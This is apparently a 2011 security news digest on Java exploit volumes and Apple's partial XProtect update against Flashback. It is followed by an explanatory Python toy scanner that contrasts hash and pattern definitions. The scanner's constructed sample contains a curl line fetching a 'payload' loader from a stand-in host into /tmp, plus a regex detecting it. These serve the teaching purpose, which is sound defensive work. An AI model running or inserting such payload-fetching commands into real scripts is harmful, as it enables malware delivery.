Hackers launch millions of Java exploits, says Microsoft. Hackers continue to launch attacks exploiting vulnerabilities in Oracle’s Java software in record numbers, Microsoft said November 28. Citing research from a recent report, a director in the company’s Trustworthy Computing group said up to half of all attacks detected and blocked by Microsoft’s security software over a 12-month period were Java exploits. Altogether, Microsoft stopped more than 27 million Java exploits from mid-2010 through mid-2011. Most of those exploits targeted long-ago-patched vulnerabilities, the director said. The most commonly blocked Java attacks — over 2.5 million — in the first half of 2011 exploited a bug disclosed in March 2010 and patched by Oracle the same month. Second on the popularity chart for the 12-month stretch was an exploit of a bug patched in December 2008. Other bugs that made the actively exploited list were quashed in November 2009 and March 2010.
Apple issues late XProtect update for Flashback Trojan. To help combat malicious software, Apple incorporated a feature into OS X called XProtect, a rudimentary scanner for newly downloaded files that notifies users if they contain malware. But when the scanner’s definitions are updated, criminals will likely release new variants. Currently there is no new known malware for OS X, but criminals behind one of the newer attacks, called Flashback, have been creating new variants. Flashback was first found in late September packaged as an installer for the popular Flash Player plug-in. When run, the malware installed a loader into the user’s preferences folder. In its second revision (found in late October), the malware changed to inject code into Web browser applications (Safari and Firefox), which would launch the malware when these programs were run. In both cases, the malware attempts to send personal information to remote servers. Apple’s XProtect definitions were updated to tackle the first Flashback malware (OSX/Flashback.A); after that, XProtect was last updated November 1 to include definitions for the DevilRobber malware. On November 29, Apple updated XProtect again to deal with Flashback — however, despite there being a number of new Flashback variants, the update only includes definitions for the second release of Flashback (OSX/Flashback.B), which was found about a month ago. Security company Intego recently reported that the Flashback malware has undergone a number of changes that allow the code to slide past malware detection schemes, even though the behavior of the malware has not changed much.
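The last two sentences describe the basic limitation of a definition-based scanner: a definition that identifies one exact file covers one variant, while the family keeps changing. The following is an added illustration written for this page of why that is, not XProtect's code or definition format and not anything derived from Flashback; the two "definitions", the sample installer script and the family names `OSX/Example.A` and `OSX/Example.B` are constructed stand-ins.

```python
import hashlib
import hmac
import re

# Constructed sample of a "downloaded installer" (a harmless shell snippet).
SAMPLE_ORIGINAL = (
    b"#!/bin/sh\n"
    b"# installer\n"
    b"curl -o /tmp/loader http://c2.invalid/payload\n"
)

# A variant with identical behaviour: only a comment changed case.
SAMPLE_VARIANT = SAMPLE_ORIGINAL.replace(b"# installer", b"# Installer")

# Constructed definitions. Example.A identifies one exact file by hash, the
# way a definition written against a single captured sample does; Example.B
# describes a behavioural trait of the family (fetching a loader into /tmp).
DEFINITIONS = {
    "OSX/Example.A": {"sha256": hashlib.sha256(SAMPLE_ORIGINAL).hexdigest()},
    "OSX/Example.B": {"pattern": re.compile(rb"curl\s+-o\s+/tmp/\w+\s+http://")},
}


def scan(data: bytes) -> list:
    """Return the names of every definition that matches the file contents."""
    hits = []
    digest = hashlib.sha256(data).hexdigest()
    for name, sig in DEFINITIONS.items():
        if "sha256" in sig and hmac.compare_digest(digest, sig["sha256"]):
            hits.append(name)
        elif "pattern" in sig and sig["pattern"].search(data):
            hits.append(name)
    return hits


def coverage_report(samples: dict) -> dict:
    """Map each sample name to the definitions that caught it; samples with an
    empty list are the ones a definition update would still be missing."""
    return {name: scan(data) for name, data in samples.items()}


if __name__ == "__main__":
    report = coverage_report({
        "original": SAMPLE_ORIGINAL,
        "variant": SAMPLE_VARIANT,
        "benign": b"echo hello\n",
    })
    for name, hits in report.items():
        print(f"{name:>8}: {hits or 'clean'}")
```

Running it shows the original caught by both definitions, the re-commented variant caught only by the pattern definition, and the benign file by neither. That gap between a hash-of-one-sample definition and a trait-based one is the difference between an update that covers Flashback.B alone and one that would still match the newer variants Intego describes.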
